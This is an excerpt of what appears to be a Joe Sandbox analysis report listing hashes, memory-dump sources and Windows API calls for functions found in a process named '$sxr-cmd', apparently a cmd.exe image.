• Opcode ID: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction ID: 74c8c5c2a9cfd806e016ee0cc343db5c4a71af55dabdb27aaee14228300826aa
• Opcode Fuzzy Hash: cc4878986f4e42514252d7eb877981450ae5bf52a0b27ba4d12556fbaf1eff51
• Instruction Fuzzy Hash: ECF07038A15F02CBD744AB15E845474B7A0FB8A721FD44174C90E53310DF7EA529C730
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: DriveType
• String ID: :
• API String ID: 338552980-336475711
• Opcode ID: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
• Instruction ID: d7d9e33b9073df5b5bc97a81d6141401db755ad9da1d5204c83f5650f7ce4510
• Opcode Fuzzy Hash: 3bcdc316eb0a86f33f1a800567ff16fc16a0090fe1dc924e7a0720ee54c15b7d
• Instruction Fuzzy Hash: 72E06566618A40CBD760AF50E45106AF7A0FB8D358FC41525D99D83764DB3CD25DCB18
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3355953691.000002155A580000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002155A580000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a580000_$sxr-cmd.jbxd
Similarity
• API ID: AllocLibraryLoadVirtual
• String ID:
• API String ID: 3550616410-0
• Opcode ID: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction ID: 10d3d97f47581953e9336e15441d5fba1325b7f5869809364f5b99c69c15253a
• Opcode Fuzzy Hash: c08d5994cd16833e0b2f32063a698386d398f42b663dd23f5820244360bcf6f8
• Instruction Fuzzy Hash: 63614632702A62E7EF58CF15C454BBD7792FBA4B98FE48021EA2907785DB38D856C700
Uniqueness
Uniqueness Score: -1.00%
APIs
  • Part of subcall function 00007FF7137ECD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDA6
  • Part of subcall function 00007FF7137ECD90: RtlAllocateHeap.NTDLL(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDBD
• GetConsoleTitleW.KERNELBASE ref: 00007FF7137F5B52
  • Part of subcall function 00007FF7137F4224: InitializeProcThreadAttributeList.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7137F4297
  • Part of subcall function 00007FF7137F4224: UpdateProcThreadAttribute.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7137F42D7
  • Part of subcall function 00007FF7137F4224: memset.MSVCRT ref: 00007FF7137F42FD
  • Part of subcall function 00007FF7137F4224: memset.MSVCRT ref: 00007FF7137F4368
  • Part of subcall function 00007FF7137F4224: GetStartupInfoW.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00007FF7137F4380
  • Part of subcall function 00007FF7137F4224: wcsrchr.MSVCRT ref: 00007FF7137F43E6
  • Part of subcall function 00007FF7137F4224: lstrcmpW.KERNELBASE ref: 00007FF7137F4401
• GetConsoleTitleW.API-MS-WIN-CORE-CONSOLE-L2-2-0 ref: 00007FF7137F5BC7
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: memset$AttributeConsoleHeapProcThreadTitlewcsrchr$AllocateInfoInitializeListProcessStartupUpdate_wcsnicmplstrcmpwcschr
• String ID:
• API String ID: 346765439-0
• Opcode ID: 722cf97fa004147e5ee739933938ffa1972c5aff5cae2a5bc049a9bf08618945
• Instruction ID: a1d2dae8c47702359222567d1c1b3779d8c7358e5cfd2a390cee448d531d1095
• Opcode Fuzzy Hash: 722cf97fa004147e5ee739933938ffa1972c5aff5cae2a5bc049a9bf08618945
• Instruction Fuzzy Hash: C631B720A0CE4286FBA0B711A4D05BDE295BF8DBA0FC45135E95E67B85DE3CE50EC720
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: EnvironmentStrings$Free
• String ID:
• API String ID: 3328510275-0
• Opcode ID: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
• Instruction ID: 0fe03692866b091e5092c9475ab346809a175269e1f7387d993380b02d75f7ac
• Opcode Fuzzy Hash: bd5886a123fb30aceff93104e580cf9002bf450ac6e21f1a4886c8727fcf9fb4
• Instruction Fuzzy Hash: 4821C532B14FA4D1EE609F12A404699E6A6F7E5BD5F884264BE8B23BD8DF3CC4558300
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: FileHandleType
• String ID:
• API String ID: 3000768030-0
• Opcode ID: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
• Instruction ID: 49b664d94c1fc750bc92424658060722a54c15f961c8e3efcfa5a5484001a480
• Opcode Fuzzy Hash: 886dffb09205d202da52528ad762ca177720b59a1f976d6d5f71bc5666910ac8
• Instruction Fuzzy Hash: 92310C33518F68E1EF648F1484986A86B52F396BB8FA80389FB5B073E0CB38D455C350
Uniqueness
Uniqueness Score: -1.00%
APIs
• FindClose.KERNELBASE(?,?,?,00007FF71380EAC5,?,?,?,00007FF71380E925,?,?,?,?,00007FF7137EB9B1), ref: 00007FF7137F3A56
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
• Instruction ID: dedb54be454d3084b282164fb4930f670bb47e07ffe3e8588aff4bf307190bd5
• Opcode Fuzzy Hash: bab5306cd567feeb86bb0befbcdd41048a3801cd437bd301f39ca3c6803b8cd3
• Instruction Fuzzy Hash: 4001C420E18E43C9F7D4A716A4D0075E6A4FF8CB60BD08530F52EA2654DE2CE49DC320
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Concurrency::cancel_current_taskmalloc
• String ID:
• API String ID: 1412018758-0
• Opcode ID: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
• Instruction ID: b5b9a0c0e91dfb1e0db6e8d431797c243729f9133cb4160b088edab4304e2f78
• Opcode Fuzzy Hash: 1cbc76b91adcbc50426ec0160b6c43d02b5c02c802198208a66957b4662997da
• Instruction Fuzzy Hash: 7CE0ED41F59A0795FFD47B6268C117492587F5E760F982430DD2D25382EE2DE0ADC730
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDA6
• RtlAllocateHeap.NTDLL(?,?,?,00007FF7137EB9A1,?,?,?,?,00007FF7137ED81A), ref: 00007FF7137ECDBD
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetUserDefaultLangID.KERNELBASE(?,?,?,?,00007FF7137E6F97), ref: 00007FF7137F550C
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: DefaultLangUser
• String ID:
• API String ID: 768647712-0
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: AllocHeap
• String ID:
• API String ID: 4292702814-0
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3356177437.000002155A5B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002155A5B0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_2155a5b0000_$sxr-cmd.jbxd
Similarity
• API ID: FreeHeap
• String ID:
• API String ID: 3298025750-0
Uniqueness
Uniqueness Score: -1.00%
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: free
• String ID:
• API String ID: 1294909896-0
Uniqueness
Uniqueness Score: -1.00%
APIs
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713807F44
• _get_osfhandle.MSVCRT ref: 00007FF713807F5C
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713807F9E
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713807FFF
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808020
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808036
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808061
• RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808075
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138080D6
• RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138080EA
• _wcsnicmp.MSVCRT ref: 00007FF713808177
• _wcsnicmp.MSVCRT ref: 00007FF71380819A
• _wcsnicmp.MSVCRT ref: 00007FF7138081BD
• _wcsnicmp.MSVCRT ref: 00007FF7138081DC
• _wcsnicmp.MSVCRT ref: 00007FF7138081FB
• _wcsnicmp.MSVCRT ref: 00007FF71380821A
• _wcsnicmp.MSVCRT ref: 00007FF713808239
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808291
• SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138082D7
• FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138082FB
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71380831A
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808364
• RtlFreeHeap.NTDLL(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808378
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF71380839A
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138083AE
• AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF7138083E6
• ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808403
• ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,?,?,?,?,00000000,00000000,0000237B,00000000,00000002,00002328,00000001,0000000A), ref: 00007FF713808418
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferInfoReadReleaseScreen$AllocCharacterCursorFillHandleOutputPositionWrite_get_osfhandle
• String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
• API String ID: 3637805771-3100821235
Uniqueness
Uniqueness Score: -1.00%
APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: File_get_osfhandle$memset$PathPointerReadSearchSizeType_wcsnicmpwcsrchr
• String ID: DPATH
• API String ID: 95024817-2010427443
                                                                                                            • Opcode ID: 4eba62a14e43abc6af58f84d659d5bf88ed7609b6ae651bb9c78c46a9deec993
                                                                                                            • Instruction ID: 21ba95c4a299ed6acff317cb1e4ccdb7d1070e6236b727445d1336d03edfbab2
                                                                                                            • Opcode Fuzzy Hash: 4eba62a14e43abc6af58f84d659d5bf88ed7609b6ae651bb9c78c46a9deec993
                                                                                                            • Instruction Fuzzy Hash: D612C932A18E828AE7A0AF159440179FBE1FB89764F844235EA5E77794DF3DD41CCB20
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID:
• String ID: [...]$ [..]$ [.]$...$:
• API String ID: 0-1980097535
• Opcode ID: d3563aa8005a2adb5706af48719c403af2b001f51d2085656c98ee63d3bc0941
• Instruction ID: 05c867c37357364b347822227e01ba93656e3d872bedea15a09a0583c8c511ef
• Opcode Fuzzy Hash: d3563aa8005a2adb5706af48719c403af2b001f51d2085656c98ee63d3bc0941
• Instruction Fuzzy Hash: AB32C272A08F8286EBA0EF25D4402F9B3E4EB497A4F814131DA1D2B695DF7DE51DC720
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Time$File$System$DateDefaultFormatInfoLangLocalLocaleUsermemmoverealloc
• String ID: %02d%s%02d%s%02d$%s $%s %s $.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
• API String ID: 4111365348-3662956551
• Opcode ID: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
• Instruction ID: 26f31adcbf2b61761f8b1ce6303299074f4f1c004ecb67005d5161881323714c
• Opcode Fuzzy Hash: 74249970fbf2e4b7620cc53d3e0e908d97b29c4ace187a61a8b0bb0729ed9366
• Instruction Fuzzy Hash: 1AE1B061A08E4286FB90AB64A8805B9E7A1FF887B4FD44132D90E77695DF3DE51CC730
Uniqueness
Uniqueness Score: -1.00%

APIs
• _wcsupr.MSVCRT ref: 00007FF71380EF33
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EF98
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EFA9
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EFBF
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF71380EFDC
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380EFED
• GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F003
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F022
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F083
• FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F092
• GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F0A5
• towupper.MSVCRT ref: 00007FF71380F0DB
• wcschr.MSVCRT ref: 00007FF71380F135
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F16C
• SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,0000000B,?,00000002,00000000,?,?,0000002F,00007FF71380E964), ref: 00007FF71380F185
  • Part of subcall function 00007FF7137F01B8: _get_osfhandle.MSVCRT ref: 00007FF7137F01C4
  • Part of subcall function 00007FF7137F01B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7137FE904,?,?,?,?,00000000,00007FF7137F3491,?,?,00000000,00007FF713804420), ref: 00007FF7137F01D6
Strings
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71382F000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF713834000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF713839000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3362717155.00007FF71383D000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_7ff7137e0000_$sxr-cmd.jbxd
Similarity
• API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_get_osfhandle_wcsuprtowupperwcschr
• String ID: <noalias>$CMD.EXE
• API String ID: 1161012917-1690691951
• Opcode ID: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction ID: 59a5d070a71c3f5a3f1a8fc5299afb0a8c5fa8ef5e0de52ca7ce586b32b4199e
• Opcode Fuzzy Hash: f8298d22c9df71f240bd9e1abb4a97c4f8b0018ea53697e3e253b80e8643b65e
• Instruction Fuzzy Hash: 6291A122B08E428AFB95AB60E4400BDBAA0BF49B74F848135DD0E666D4DF3DA45DC330
Uniqueness
Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00007FF7137F3578: _get_osfhandle.MSVCRT ref: 00007FF7137F3584
  • Part of subcall function 00007FF7137F3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F359C
  • Part of subcall function 00007FF7137F3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35C3
  • Part of subcall function 00007FF7137F3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35D9
  • Part of subcall function 00007FF7137F3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F35ED
  • Part of subcall function 00007FF7137F3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF7137E32E8,?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014), ref: 00007FF7137F3602
• _get_osfhandle.MSVCRT ref: 00007FF7137E32F3
• GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,0000000B,?,00000000,00000014,?,?,0000002F,00007FF7137E32A4), ref: 00007FF7137E3309
• WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0 ref: 00007FF7137E3384
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7138011DF
Memory Dump Source
• Source File: 0000000D.00000002.3360838477.00007FF7137E1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF7137E0000, based on PE: true
• Associated: 0000000D.00000002.3360598837.00007FF7137E0000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361419662.00007FF713812000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 0000000D.00000002.3361797943.00007FF71381D000.00000004.00000001.01000000.0000000B.sdmp
